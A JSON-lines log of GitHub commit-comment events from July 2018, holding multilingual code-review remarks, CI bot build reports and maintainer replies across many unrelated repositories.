{"id":"7965525605","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708679,"position":46,"line":46,"path":"app/Basket.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:39:33Z","updated_at":"2018-07-14T09:39:33Z","author_association":"NONE","body":"İkinci parametre olarak kolon adını yazmak tercih edilebilir."}},"created_at":"2018-07-14T09:39:33Z"}
{"id":"7965526423","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708680,"position":13,"line":13,"path":"app/Category.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:40:17Z","updated_at":"2018-07-14T09:40:17Z","author_association":"NONE","body":"Şu zımbırtıya acayip kıl oluyorum :)"}},"created_at":"2018-07-14T09:40:17Z"}
{"id":"7965527145","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708682,"position":26,"line":26,"path":"app/Category.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:40:56Z","updated_at":"2018-07-14T09:40:56Z","author_association":"NONE","body":"3. parametre olarak id'ye gerek olmayabilir. table'larda genel olarak \"id\" kullanılıyorsa tabi."}},"created_at":"2018-07-14T09:40:56Z"}
{"id":"7965527291","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"nulll-pointer/phpmyadmin"},"payload":{"comment":{"id":29708683,"position":null,"line":null,"path":null,"commit_id":"4858c4b02dbe37f179a570eb3e1f8fd393d550ff","created_at":"2018-07-14T09:41:04Z","updated_at":"2018-07-14T09:41:04Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-14T09:41:04Z"}
{"id":"7965527536","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708684,"position":31,"line":31,"path":"app/Category.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:41:16Z","updated_at":"2018-07-14T09:41:16Z","author_association":"NONE","body":"4. parametreyi de yazmak iyi bir alışkanlık bence."}},"created_at":"2018-07-14T09:41:16Z"}
{"id":"7965527700","type":"CommitCommentEvent","actor":{"login":"mclarekin"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29708685,"position":null,"line":null,"path":null,"commit_id":"aee9b6fb7ef0af9b6e3b668b7a69751314347ddd","created_at":"2018-07-14T09:41:24Z","updated_at":"2018-07-14T09:41:24Z","author_association":"COLLABORATOR","body":"i think all changes are now done??. Script fixed  fractal_coloring_cl.hpp\nthat i had forgotten to update. So maybe appveyor problem is now gone.\n\nOn Sat, Jul 14, 2018 at 8:20 PM, Krzysztof Marczak <notifications@github.com\n> wrote:\n\n> I have just run populateOpenCL.pho to update fractal_cl.h and\n> fractal_coloring_cl.hpp\n>\n> @mclarekin <https://github.com/mclarekin> , please make the same changes\n> in OpenCL code for fractal coloring\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/buddhi1980/mandelbulber2/commit/aee9b6fb7ef0af9b6e3b668b7a69751314347ddd#commitcomment-29708328>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMLZHIJKGiB0477lkBvlSN3ODzbsDqwbks5uGanIgaJpZM4VPxv7>\n> .\n>\n"}},"created_at":"2018-07-14T09:41:24Z"}
{"id":"7965528100","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708686,"position":31,"line":31,"path":"app/Category.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:41:43Z","updated_at":"2018-07-14T09:41:43Z","author_association":"NONE","body":"Ek olarak products isminde ilişki tablosu garip geldi. Bir yanlışlık olmasın?"}},"created_at":"2018-07-14T09:41:43Z"}
{"id":"7965528978","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708688,"position":22,"line":22,"path":"app/Http/Controllers/Admin/CategoryController.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:42:30Z","updated_at":"2018-07-14T09:42:30Z","author_association":"NONE","body":"Daha iyi bir isim verilebilri."}},"created_at":"2018-07-14T09:42:30Z"}
{"id":"7965529250","type":"CommitCommentEvent","actor":{"login":"thanhkma1996"},"repo":{"name":"thanhkma1996/manufacturer"},"payload":{"comment":{"id":29708689,"position":33,"line":33,"path":"Controller/Index/Add.php","commit_id":"b9a01d9c0fb50bd79a3dad41ad3d329a884bdc0c","created_at":"2018-07-14T09:42:44Z","updated_at":"2018-07-14T09:42:44Z","author_association":"OWNER","body":"public fu"}},"created_at":"2018-07-14T09:42:44Z"}
{"id":"7965529910","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708691,"position":34,"line":28,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T09:43:19Z","updated_at":"2018-07-14T09:43:19Z","author_association":"NONE","body":"можно после `nav` добавить промо блок с картинкой супа"}},"created_at":"2018-07-14T09:43:19Z"}
{"id":"7965530554","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708692,"position":53,"line":53,"path":"app/Http/Controllers/Admin/CategoryController.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:43:54Z","updated_at":"2018-07-14T09:43:54Z","author_association":"NONE","body":"Burada create all diyerek az kod yerine, interface'i daha açık bir şekilde ortaya koymak faydalı olabilir."}},"created_at":"2018-07-14T09:43:54Z"}
{"id":"7965530786","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708693,"position":56,"line":56,"path":"app/Http/Controllers/Admin/CategoryController.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:44:08Z","updated_at":"2018-07-14T09:44:08Z","author_association":"NONE","body":"Named route tercih edilebilir."}},"created_at":"2018-07-14T09:44:08Z"}
{"id":"7965531441","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708694,"position":17,"line":11,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T09:44:41Z","updated_at":"2018-07-14T09:44:41Z","author_association":"NONE","body":"`page-header__logo` у тебя дважды  на разных элементах на ссылке и на картинке.\r\nНо у них ведь стили разные будут задаваться.\r\nНадо картинке дать `page-header__logo-image`  например.\r\n"}},"created_at":"2018-07-14T09:44:41Z"}
{"id":"7965532277","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708698,"position":100,"line":100,"path":"app/Http/Controllers/Admin/CategoryController.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:45:20Z","updated_at":"2018-07-14T09:45:20Z","author_association":"NONE","body":"Request all kullanımına takıldım nedense :)"}},"created_at":"2018-07-14T09:45:20Z"}
{"id":"7965532485","type":"CommitCommentEvent","actor":{"login":"dhiraj0347"},"repo":{"name":"dhiraj0347/Test"},"payload":{"comment":{"id":29708699,"position":null,"line":null,"path":null,"commit_id":"9fe582fd40f5783ceefb7ed0b37d200a65d91e57","created_at":"2018-07-14T09:45:31Z","updated_at":"2018-07-14T09:45:31Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-14T09:45:31Z"}
{"id":"7965532788","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708700,"position":120,"line":120,"path":"app/Http/Controllers/Admin/CategoryController.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:45:46Z","updated_at":"2018-07-14T09:45:46Z","author_association":"NONE","body":"Buradaki if gereksiz olabilir."}},"created_at":"2018-07-14T09:45:46Z"}
{"id":"7965533175","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708701,"position":127,"line":127,"path":"app/Http/Controllers/Admin/CategoryController.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:46:07Z","updated_at":"2018-07-14T09:46:07Z","author_association":"NONE","body":"Yukarıdaki foreach içinde halledilebilir."}},"created_at":"2018-07-14T09:46:07Z"}
{"id":"7965533569","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708702,"position":128,"line":128,"path":"app/Http/Controllers/Admin/CategoryController.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:46:27Z","updated_at":"2018-07-14T09:46:27Z","author_association":"NONE","body":"Controller içindeki bu kodu repo sınıfına taşınabilir."}},"created_at":"2018-07-14T09:46:27Z"}
{"id":"7965533813","type":"CommitCommentEvent","actor":{"login":"alanasp"},"repo":{"name":"alanasp/ghc-gsoc"},"payload":{"comment":{"id":29708703,"position":31,"line":408,"path":"compiler/rename/RnNames.hs","commit_id":"68925a419063856b8524ea94e0c8b43469c3818c","created_at":"2018-07-14T09:46:39Z","updated_at":"2018-07-14T09:46:39Z","author_association":"OWNER","body":"That’s true, it didn’t, but there is a commit right after, properly\nresolving the conflict\n\nOn Sat, 14 Jul 2018 at 11:50, Erik de Castro Lopo <notifications@github.com>\nwrote:\n\n> I don't think that is going to compile :).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/alanasp/ghc-gsoc/commit/68925a419063856b8524ea94e0c8b43469c3818c#commitcomment-29708404>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHebSnV6JL2DlCbHbB28IBsvv_7d4eoCks5uGbDUgaJpZM4VPyPH>\n> .\n>\n-- \nAlanas Plaščinskas\n"}},"created_at":"2018-07-14T09:46:39Z"}
{"id":"7965534083","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708704,"position":137,"line":137,"path":"app/Http/Controllers/Admin/CategoryController.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:46:53Z","updated_at":"2018-07-14T09:46:53Z","author_association":"NONE","body":"named route tercih edilebilir."}},"created_at":"2018-07-14T09:46:53Z"}
{"id":"7965535290","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708706,"position":32,"line":26,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T09:48:01Z","updated_at":"2018-07-14T09:48:01Z","author_association":"NONE","body":"в навигации классы нормальные, но можно ещё упростить и вместо `site-list` сделать `menu` например)\r\nи для всех элементов внутри тогда будет покороче `menu__item menu__item--active`"}},"created_at":"2018-07-14T09:48:01Z"}
{"id":"7965537721","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29708709,"position":null,"line":null,"path":null,"commit_id":"ab3b7471c09251566b583a35eb5055f2b10b0bcf","created_at":"2018-07-14T09:50:13Z","updated_at":"2018-07-14T09:50:13Z","author_association":"MEMBER","body":"#895"}},"created_at":"2018-07-14T09:50:13Z"}
{"id":"7965541130","type":"CommitCommentEvent","actor":{"login":"gamenewsteam"},"repo":{"name":"2214445407/DataLifeEngine"},"payload":{"comment":{"id":29708713,"position":null,"line":null,"path":null,"commit_id":"3661cf3ebb8616e1a34a97294da717795828bfce","created_at":"2018-07-14T09:53:20Z","updated_at":"2018-07-14T09:53:20Z","author_association":"COLLABORATOR","body":"Good!"}},"created_at":"2018-07-14T09:53:20Z"}
{"id":"7965541834","type":"CommitCommentEvent","actor":{"login":"msmb4u"},"repo":{"name":"msmb4u/MyFirstRemoteApp"},"payload":{"comment":{"id":29708715,"position":null,"line":null,"path":null,"commit_id":"8fa525e64192e4da1f58b6e2c62f352f332fe3db","created_at":"2018-07-14T09:54:00Z","updated_at":"2018-07-14T09:54:00Z","author_association":"OWNER","body":"Title should be at line1"}},"created_at":"2018-07-14T09:54:00Z"}
{"id":"7965542779","type":"CommitCommentEvent","actor":{"login":"rfm"},"repo":{"name":"gnustep/libs-base"},"payload":{"comment":{"id":29708718,"position":null,"line":null,"path":null,"commit_id":"e60b2004afd50af16d6c29ff90a4b1a11a066c10","created_at":"2018-07-14T09:54:56Z","updated_at":"2018-07-14T09:54:56Z","author_association":"CONTRIBUTOR","body":"\n\n> On 14 Jul 2018, at 10:22, Fred Kiefer <notifications@github.com> wrote:\n> \n> HI Richard,\n> I am confused by the check on line 992, is this something you forgot to remove after finishing your tests?\n\nNo, it seems git only comitted part of my changes."}},"created_at":"2018-07-14T09:54:56Z"}
{"id":"7965544448","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708721,"position":38,"line":31,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T09:56:22Z","updated_at":"2018-07-14T09:56:22Z","author_association":"NONE","body":"`page-main` в принципе можно не давать, если потом потребуется можно будет добавить) пока не видно стилей, которые будем на него вешать, так что можно убирать"}},"created_at":"2018-07-14T09:56:22Z"}
{"id":"7965546009","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-raspberrypi"},"payload":{"comment":{"id":29708722,"position":null,"line":null,"path":null,"commit_id":"2fbe3b3efbba5f60892d9215cf75c6dcec972baf","created_at":"2018-07-14T09:57:52Z","updated_at":"2018-07-14T09:57:52Z","author_association":"MEMBER","body":"I think we need to use https://github.com/agherzan/meta-raspberrypi/tree/sumo as it has new kernel and new recipes ..."}},"created_at":"2018-07-14T09:57:52Z"}
{"id":"7965546752","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29708723,"position":27,"line":308,"path":"compile.rkt","commit_id":"5cc972db9c57414cc78e828bf7190b5d33958a09","created_at":"2018-07-14T09:58:36Z","updated_at":"2018-07-14T09:58:36Z","author_association":"OWNER","body":"Don't use `gcc`, use `cc`"}},"created_at":"2018-07-14T09:58:36Z"}
{"id":"7965547893","type":"CommitCommentEvent","actor":{"login":"zhuyewen"},"repo":{"name":"zhuyewen/Python-test"},"payload":{"comment":{"id":29708724,"position":2,"line":67,"path":"test","commit_id":"95b7e6255fdb779f75dd4255fdae0c46fc139b63","created_at":"2018-07-14T09:59:41Z","updated_at":"2018-07-14T09:59:41Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-14T09:59:41Z"}
{"id":"7966548581","type":"CommitCommentEvent","actor":{"login":"yjqiang"},"repo":{"name":"yjqiang/bilibili-live-tools"},"payload":{"comment":{"id":29710883,"position":null,"line":null,"path":null,"commit_id":"7456455f33bbfc5fdcc94eb9e080d5f74b97e0ba","created_at":"2018-07-15T00:01:02Z","updated_at":"2018-07-15T00:01:02Z","author_association":"OWNER","body":"#68 "}},"created_at":"2018-07-15T00:01:02Z"}
{"id":"7966549926","type":"CommitCommentEvent","actor":{"login":"vikmeup"},"repo":{"name":"TrustWallet/trust-core"},"payload":{"comment":{"id":29710884,"position":14,"line":38,"path":"Sources/Ethereum/EthereumAddress.swift","commit_id":"9334767239a5f2f141e64dac9966bb54f249f425","created_at":"2018-07-15T00:02:17Z","updated_at":"2018-07-15T00:02:17Z","author_association":"MEMBER","body":"Yeah, good point. I have renamed local variable so it stores correctly into the file system. but still need to rename `Blockchain` as well? "}},"created_at":"2018-07-15T00:02:17Z"}
{"id":"7966550031","type":"CommitCommentEvent","actor":{"login":"lonesome-data"},"repo":{"name":"lonesome-data/lonesome-data.github.io"},"payload":{"comment":{"id":29710885,"position":null,"line":null,"path":null,"commit_id":"df50d2178cef857d4158403d32db15eb37006b90","created_at":"2018-07-15T00:02:23Z","updated_at":"2018-07-15T00:02:23Z","author_association":"OWNER","body":"add resume to asset dir"}},"created_at":"2018-07-15T00:02:23Z"}
{"id":"7966551207","type":"CommitCommentEvent","actor":{"login":"joelgomes1994"},"repo":{"name":"UnidayStudio/UPBGE-UtilsTemplate"},"payload":{"comment":{"id":29710888,"position":40,"line":40,"path":"Source/SoundSpeaker.py","commit_id":"0415be426dece282b16aee24079183e152bace80","created_at":"2018-07-15T00:03:48Z","updated_at":"2018-07-15T00:03:48Z","author_association":"NONE","body":"Cara, nessa parte eu usaria a biblioteca `pathlib` pra gerenciar a formatação do caminho do arquivo, tipo assim:\r\n\r\n``` python3\r\nsName = pathlib.Path(bge.logic.expandPath(\"//\") + \"/\" + args[\"Sound File\"])\r\n\r\n# Método do objeto Path, verifica se o caminho existe\r\nif sName.exists():\r\n    # Método do objeto Path, verifica se é um arquivo\r\n    if sName.is_file():\r\n        sName = sName.resolve().as_posix() # Normaliza o path, então converte para o formato Linux de path\r\n        self.factory = aud.Factory(sName)\r\n```\r\n\r\nDessa forma, além de poder tratar erros caso o nome do arquivo estiver errado, o usuário pode até mesmo colocar caminhos relativos de pastas no campo 'Sound File' do component, como:\r\n`\"Sound File\" : \"sounds/sfx/paranaue.wav\"`"}},"created_at":"2018-07-15T00:03:48Z"}
{"id":"7966554978","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29710896,"position":null,"line":null,"path":null,"commit_id":"7d9b0cf129b0c320bedc2b718479e70f0bcdcd05","created_at":"2018-07-15T00:08:01Z","updated_at":"2018-07-15T00:08:01Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.336`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/404022169) :tada:"}},"created_at":"2018-07-15T00:08:01Z"}
{"id":"7966557369","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29710900,"position":null,"line":null,"path":null,"commit_id":"9d82cbac690c82bd116fc37eb8c70506503f27bc","created_at":"2018-07-15T00:10:58Z","updated_at":"2018-07-15T00:10:58Z","author_association":"CONTRIBUTOR","body":"Currently not, it seems ;) Vincent, would you be so kind and take a look at creating a debian package of gemma, and put it on launchpad? Maybe after it has been split out of the \"lib\" repo. For now, building the tool works, but of course it is not usable without the shared libs.\r\n\r\nThe files that gemma installs are:\r\n/usr/include/slb/gemma-struct.h\r\n/usr/include/slb/gemma.h\r\n/usr/include/slb/kernel.h\r\n/usr/lib/m68020-60/libgemma.a\r\n/usr/lib/m5475/libgemma.a\r\n/usr/lib/libgemma.a\r\n/mint/slb/kernel32.slb\r\n/mint/slb/gemma32.slb\r\n/mint/slb/m68020-60/gemma32.slb\r\n/mint/slb/m5475/gemma32.slb\r\n\r\n"}},"created_at":"2018-07-15T00:10:58Z"}
{"id":"7966557814","type":"CommitCommentEvent","actor":{"login":"jvperrin"},"repo":{"name":"ocf/puppet"},"payload":{"comment":{"id":29710901,"position":null,"line":null,"path":null,"commit_id":"1df79144f02503d3bc3106be4a3c6a020d01d33b","created_at":"2018-07-15T00:11:30Z","updated_at":"2018-07-15T00:11:30Z","author_association":"MEMBER","body":"Nice, I think making this a template might be a bit better so that the data is still pulled from hiera (to try and have more of a single source of truth for these credentials), but this is probably better than having the file edited by augeas..."}},"created_at":"2018-07-15T00:11:30Z"}
{"id":"7966560626","type":"CommitCommentEvent","actor":{"login":"doofus-01"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29710903,"position":null,"line":null,"path":null,"commit_id":"3290961db2eb00221c94f88f02f77ab640f497a4","created_at":"2018-07-15T00:14:41Z","updated_at":"2018-07-15T00:14:41Z","author_association":"MEMBER","body":"This change prevented me from being able to compile.  Maybe you can put this in release notes, since there was some sort of dependency change."}},"created_at":"2018-07-15T00:14:41Z"}
{"id":"7966564946","type":"CommitCommentEvent","actor":{"login":"StudentBlake"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29710910,"position":null,"line":null,"path":null,"commit_id":"426f5844f022659de648494e64fd07a063b6ecc1","created_at":"2018-07-15T00:19:24Z","updated_at":"2018-07-15T00:19:24Z","author_association":"CONTRIBUTOR","body":"It's a quick and dirty fix for games or paths that have apostrophes in them."}},"created_at":"2018-07-15T00:19:24Z"}
{"id":"7966565371","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710911,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-15T00:19:59Z","updated_at":"2018-07-15T00:19:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T00:19:59Z"}
{"id":"7966566226","type":"CommitCommentEvent","actor":{"login":"abizer"},"repo":{"name":"ocf/puppet"},"payload":{"comment":{"id":29710912,"position":null,"line":null,"path":null,"commit_id":"1df79144f02503d3bc3106be4a3c6a020d01d33b","created_at":"2018-07-15T00:20:57Z","updated_at":"2018-07-15T00:20:57Z","author_association":"MEMBER","body":"making it a template would be a good idea because currently there's two copies of this file that need to be kept in sync, supernova's and marathon crwate's version. "}},"created_at":"2018-07-15T00:20:57Z"}
{"id":"7966573177","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710931,"position":null,"line":null,"path":null,"commit_id":"ea744ee28374298283a237e23a9837d667abe50a","created_at":"2018-07-15T00:28:45Z","updated_at":"2018-07-15T00:28:45Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T00:28:45Z"}
{"id":"7966573477","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710932,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-15T00:29:08Z","updated_at":"2018-07-15T00:29:08Z","author_association":"NONE","body":"#6517-MissingEquationReference (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2940 of 2940 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T00:29:08Z"}
{"id":"7966577510","type":"CommitCommentEvent","actor":{"login":"lepon01"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29710940,"position":null,"line":null,"path":null,"commit_id":"35c7c978070c8368c4ceab5cb0f8776ddf268ac1","created_at":"2018-07-15T00:33:14Z","updated_at":"2018-07-15T00:33:14Z","author_association":"MEMBER","body":"But `showModal()` isn't being used\r\n\r\n![image](https://user-images.githubusercontent.com/13886925/42729400-06b7793c-87cf-11e8-80c1-78e7a43e4773.png))\r\n"}},"created_at":"2018-07-15T00:33:14Z"}
{"id":"7966578032","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29710941,"position":1,"line":1,"path":"5.python3 string decode and encode","commit_id":"3ffafdfe690b8f92c8a81bbab9954858fe643ac6","created_at":"2018-07-15T00:33:39Z","updated_at":"2018-07-15T00:33:39Z","author_association":"OWNER","body":"```\r\n#-*-coding:gbk-*-\r\n#头注释用于告诉解释器用哪种编码标准去解码，右下角改标准改的是文件编码格式为gbk，但文件数据内容依旧为unicode\r\nimport sys\r\nprint(sys.getdefaultencoding())\r\ns='你好吗' #格式为unicode\r\nprint(s)\r\nprint(s.encode('gbk'))  #将该数据也编码为gbk，但因为数据为byte类型，所以无法显示字符串\r\nprint(s.encode('utf-8').decode('utf-8').encode('gb2312')) #该数据编码先编码为utf-8，再解码为unicode,再编码为gb2312，且gbk兼容gb2312\r\nprint(s.encode('utf-8').decode('utf-8').encode('gb2312').decode('gb2312'))\r\n\r\n\r\n```"}},"created_at":"2018-07-15T00:33:39Z"}
{"id":"7966580814","type":"CommitCommentEvent","actor":{"login":"nicklucius"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29710943,"position":142,"line":306,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-15T00:36:52Z","updated_at":"2018-07-15T00:36:52Z","author_association":"CONTRIBUTOR","body":"It's true that the Chicago prior-day model as a whole averaged a 1.8 FPR. Table 2 is calculated using results for 15/20 beaches, the same 15 predicted by the hybrid model, for accurate comparison.\r\n\r\nDo you think we need to add something to the narrative explaining the general model performance comments (20 beaches) vs. the side-by-side comparison against the hybrid (15 beaches)?"}},"created_at":"2018-07-15T00:36:52Z"}
{"id":"7966582347","type":"CommitCommentEvent","actor":{"login":"ptpt52"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29710944,"position":null,"line":null,"path":null,"commit_id":"888a15ff8312cd157bc968b67c33d2f738883b79","created_at":"2018-07-15T00:38:43Z","updated_at":"2018-07-15T00:38:43Z","author_association":"CONTRIBUTOR","body":"hi, same problem on pptp.so\r\nplease fix."}},"created_at":"2018-07-15T00:38:43Z"}
{"id":"7966585579","type":"CommitCommentEvent","actor":{"login":"nicklucius"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29710946,"position":188,"line":533,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-15T00:41:59Z","updated_at":"2018-07-15T00:41:59Z","author_association":"CONTRIBUTOR","body":"I think you're right about the calculation and the changes needed here. I'll can make issues for all the comments on this commit."}},"created_at":"2018-07-15T00:41:59Z"}
{"id":"7966585588","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710947,"position":null,"line":null,"path":null,"commit_id":"8b1e5a092fa43a51a252f62cd82ea6373d632421","created_at":"2018-07-15T00:41:59Z","updated_at":"2018-07-15T00:41:59Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-15T00:41:59Z"}
